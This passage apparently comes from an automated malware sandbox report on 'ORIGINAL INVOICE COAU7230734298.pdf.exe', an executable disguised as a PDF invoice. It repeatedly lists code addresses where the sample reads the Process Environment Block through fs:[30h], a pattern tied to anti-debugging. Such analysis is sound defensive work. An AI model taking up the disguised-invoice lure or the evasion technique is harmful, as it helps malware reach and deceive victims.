            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A327ED mov eax, dword ptr fs:[00000030h]3_2_01A327ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A327ED mov eax, dword ptr fs:[00000030h]3_2_01A327ED
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A147FB mov eax, dword ptr fs:[00000030h]3_2_01A147FB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A147FB mov eax, dword ptr fs:[00000030h]3_2_01A147FB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1C7C0 mov eax, dword ptr fs:[00000030h]3_2_01A1C7C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A907C3 mov eax, dword ptr fs:[00000030h]3_2_01A907C3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C720 mov eax, dword ptr fs:[00000030h]3_2_01A4C720
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C720 mov eax, dword ptr fs:[00000030h]3_2_01A4C720
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4273C mov eax, dword ptr fs:[00000030h]3_2_01A4273C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4273C mov ecx, dword ptr fs:[00000030h]3_2_01A4273C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4273C mov eax, dword ptr fs:[00000030h]3_2_01A4273C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8C730 mov eax, dword ptr fs:[00000030h]3_2_01A8C730
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C700 mov eax, dword ptr fs:[00000030h]3_2_01A4C700
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10710 mov eax, dword ptr fs:[00000030h]3_2_01A10710
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A40710 mov eax, dword ptr fs:[00000030h]3_2_01A40710
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18770 mov eax, dword ptr fs:[00000030h]3_2_01A18770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20770 mov eax, dword ptr fs:[00000030h]3_2_01A20770
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4674D mov esi, dword ptr fs:[00000030h]3_2_01A4674D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4674D mov eax, dword ptr fs:[00000030h]3_2_01A4674D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4674D mov eax, dword ptr fs:[00000030h]3_2_01A4674D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10750 mov eax, dword ptr fs:[00000030h]3_2_01A10750
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9E75D mov eax, dword ptr fs:[00000030h]3_2_01A9E75D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52750 mov eax, dword ptr fs:[00000030h]3_2_01A52750
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52750 mov eax, dword ptr fs:[00000030h]3_2_01A52750
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A94755 mov eax, dword ptr fs:[00000030h]3_2_01A94755
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C6A6 mov eax, dword ptr fs:[00000030h]3_2_01A4C6A6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A466B0 mov eax, dword ptr fs:[00000030h]3_2_01A466B0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14690 mov eax, dword ptr fs:[00000030h]3_2_01A14690
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14690 mov eax, dword ptr fs:[00000030h]3_2_01A14690
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A906F1 mov eax, dword ptr fs:[00000030h]3_2_01A906F1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A906F1 mov eax, dword ptr fs:[00000030h]3_2_01A906F1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E6F2 mov eax, dword ptr fs:[00000030h]3_2_01A8E6F2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E6F2 mov eax, dword ptr fs:[00000030h]3_2_01A8E6F2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E6F2 mov eax, dword ptr fs:[00000030h]3_2_01A8E6F2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E6F2 mov eax, dword ptr fs:[00000030h]3_2_01A8E6F2
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A6C7 mov ebx, dword ptr fs:[00000030h]3_2_01A4A6C7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A6C7 mov eax, dword ptr fs:[00000030h]3_2_01A4A6C7
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A46620 mov eax, dword ptr fs:[00000030h]3_2_01A46620
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A48620 mov eax, dword ptr fs:[00000030h]3_2_01A48620
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2E627 mov eax, dword ptr fs:[00000030h]3_2_01A2E627
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1262C mov eax, dword ptr fs:[00000030h]3_2_01A1262C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E609 mov eax, dword ptr fs:[00000030h]3_2_01A8E609
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2260B mov eax, dword ptr fs:[00000030h]3_2_01A2260B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2260B mov eax, dword ptr fs:[00000030h]3_2_01A2260B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2260B mov eax, dword ptr fs:[00000030h]3_2_01A2260B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2260B mov eax, dword ptr fs:[00000030h]3_2_01A2260B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2260B mov eax, dword ptr fs:[00000030h]3_2_01A2260B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2260B mov eax, dword ptr fs:[00000030h]3_2_01A2260B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2260B mov eax, dword ptr fs:[00000030h]3_2_01A2260B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A52619 mov eax, dword ptr fs:[00000030h]3_2_01A52619
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD866E mov eax, dword ptr fs:[00000030h]3_2_01AD866E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD866E mov eax, dword ptr fs:[00000030h]3_2_01AD866E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A660 mov eax, dword ptr fs:[00000030h]3_2_01A4A660
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A660 mov eax, dword ptr fs:[00000030h]3_2_01A4A660
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A42674 mov eax, dword ptr fs:[00000030h]3_2_01A42674
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A2C640 mov eax, dword ptr fs:[00000030h]3_2_01A2C640
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A229A0 mov eax, dword ptr fs:[00000030h]3_2_01A229A0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A109AD mov eax, dword ptr fs:[00000030h]3_2_01A109AD
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A109AD mov eax, dword ptr fs:[00000030h]3_2_01A109AD
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A989B3 mov esi, dword ptr fs:[00000030h]3_2_01A989B3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A989B3 mov eax, dword ptr fs:[00000030h]3_2_01A989B3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A989B3 mov eax, dword ptr fs:[00000030h]3_2_01A989B3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9E9E0 mov eax, dword ptr fs:[00000030h]3_2_01A9E9E0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A429F9 mov eax, dword ptr fs:[00000030h]3_2_01A429F9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A429F9 mov eax, dword ptr fs:[00000030h]3_2_01A429F9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA69C0 mov eax, dword ptr fs:[00000030h]3_2_01AA69C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]3_2_01A1A9D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]3_2_01A1A9D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]3_2_01A1A9D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]3_2_01A1A9D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]3_2_01A1A9D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A1A9D0 mov eax, dword ptr fs:[00000030h]3_2_01A1A9D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A449D0 mov eax, dword ptr fs:[00000030h]3_2_01A449D0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADA9D3 mov eax, dword ptr fs:[00000030h]3_2_01ADA9D3
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA892B mov eax, dword ptr fs:[00000030h]3_2_01AA892B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9892A mov eax, dword ptr fs:[00000030h]3_2_01A9892A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E908 mov eax, dword ptr fs:[00000030h]3_2_01A8E908
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8E908 mov eax, dword ptr fs:[00000030h]3_2_01A8E908
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A08918 mov eax, dword ptr fs:[00000030h]3_2_01A08918
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A08918 mov eax, dword ptr fs:[00000030h]3_2_01A08918
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9C912 mov eax, dword ptr fs:[00000030h]3_2_01A9C912
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A36962 mov eax, dword ptr fs:[00000030h]3_2_01A36962
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A36962 mov eax, dword ptr fs:[00000030h]3_2_01A36962
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A36962 mov eax, dword ptr fs:[00000030h]3_2_01A36962
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A5096E mov eax, dword ptr fs:[00000030h]3_2_01A5096E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A5096E mov edx, dword ptr fs:[00000030h]3_2_01A5096E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A5096E mov eax, dword ptr fs:[00000030h]3_2_01A5096E
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB4978 mov eax, dword ptr fs:[00000030h]3_2_01AB4978
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB4978 mov eax, dword ptr fs:[00000030h]3_2_01AB4978
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9C97C mov eax, dword ptr fs:[00000030h]3_2_01A9C97C
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4940 mov eax, dword ptr fs:[00000030h]3_2_01AE4940
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A90946 mov eax, dword ptr fs:[00000030h]3_2_01A90946
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10887 mov eax, dword ptr fs:[00000030h]3_2_01A10887
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9C89D mov eax, dword ptr fs:[00000030h]3_2_01A9C89D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ADA8E4 mov eax, dword ptr fs:[00000030h]3_2_01ADA8E4
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C8F9 mov eax, dword ptr fs:[00000030h]3_2_01A4C8F9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4C8F9 mov eax, dword ptr fs:[00000030h]3_2_01A4C8F9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3E8C0 mov eax, dword ptr fs:[00000030h]3_2_01A3E8C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE08C0 mov eax, dword ptr fs:[00000030h]3_2_01AE08C0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB483A mov eax, dword ptr fs:[00000030h]3_2_01AB483A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AB483A mov eax, dword ptr fs:[00000030h]3_2_01AB483A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A4A830 mov eax, dword ptr fs:[00000030h]3_2_01A4A830
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h]3_2_01A32835
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h]3_2_01A32835
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h]3_2_01A32835
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A32835 mov ecx, dword ptr fs:[00000030h]3_2_01A32835
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h]3_2_01A32835
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A32835 mov eax, dword ptr fs:[00000030h]3_2_01A32835
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9C810 mov eax, dword ptr fs:[00000030h]3_2_01A9C810
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA6870 mov eax, dword ptr fs:[00000030h]3_2_01AA6870
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AA6870 mov eax, dword ptr fs:[00000030h]3_2_01AA6870
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9E872 mov eax, dword ptr fs:[00000030h]3_2_01A9E872
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9E872 mov eax, dword ptr fs:[00000030h]3_2_01A9E872
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A22840 mov ecx, dword ptr fs:[00000030h]3_2_01A22840
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A40854 mov eax, dword ptr fs:[00000030h]3_2_01A40854
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14859 mov eax, dword ptr fs:[00000030h]3_2_01A14859
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A14859 mov eax, dword ptr fs:[00000030h]3_2_01A14859
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20BBE mov eax, dword ptr fs:[00000030h]3_2_01A20BBE
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A20BBE mov eax, dword ptr fs:[00000030h]3_2_01A20BBE
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC4BB0 mov eax, dword ptr fs:[00000030h]3_2_01AC4BB0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AC4BB0 mov eax, dword ptr fs:[00000030h]3_2_01AC4BB0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18BF0 mov eax, dword ptr fs:[00000030h]3_2_01A18BF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18BF0 mov eax, dword ptr fs:[00000030h]3_2_01A18BF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A18BF0 mov eax, dword ptr fs:[00000030h]3_2_01A18BF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A9CBF0 mov eax, dword ptr fs:[00000030h]3_2_01A9CBF0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3EBFC mov eax, dword ptr fs:[00000030h]3_2_01A3EBFC
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A30BCB mov eax, dword ptr fs:[00000030h]3_2_01A30BCB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A30BCB mov eax, dword ptr fs:[00000030h]3_2_01A30BCB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A30BCB mov eax, dword ptr fs:[00000030h]3_2_01A30BCB
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10BCD mov eax, dword ptr fs:[00000030h]3_2_01A10BCD
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10BCD mov eax, dword ptr fs:[00000030h]3_2_01A10BCD
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A10BCD mov eax, dword ptr fs:[00000030h]3_2_01A10BCD
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01ABEBD0 mov eax, dword ptr fs:[00000030h]3_2_01ABEBD0
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3EB20 mov eax, dword ptr fs:[00000030h]3_2_01A3EB20
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A3EB20 mov eax, dword ptr fs:[00000030h]3_2_01A3EB20
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD8B28 mov eax, dword ptr fs:[00000030h]3_2_01AD8B28
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AD8B28 mov eax, dword ptr fs:[00000030h]3_2_01AD8B28
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01AE4B00 mov eax, dword ptr fs:[00000030h]3_2_01AE4B00
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A8EB1D mov eax, dword ptr fs:[00000030h]3_2_01A8EB1D
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A0CB7E mov eax, dword ptr fs:[00000030h]3_2_01A0CB7E
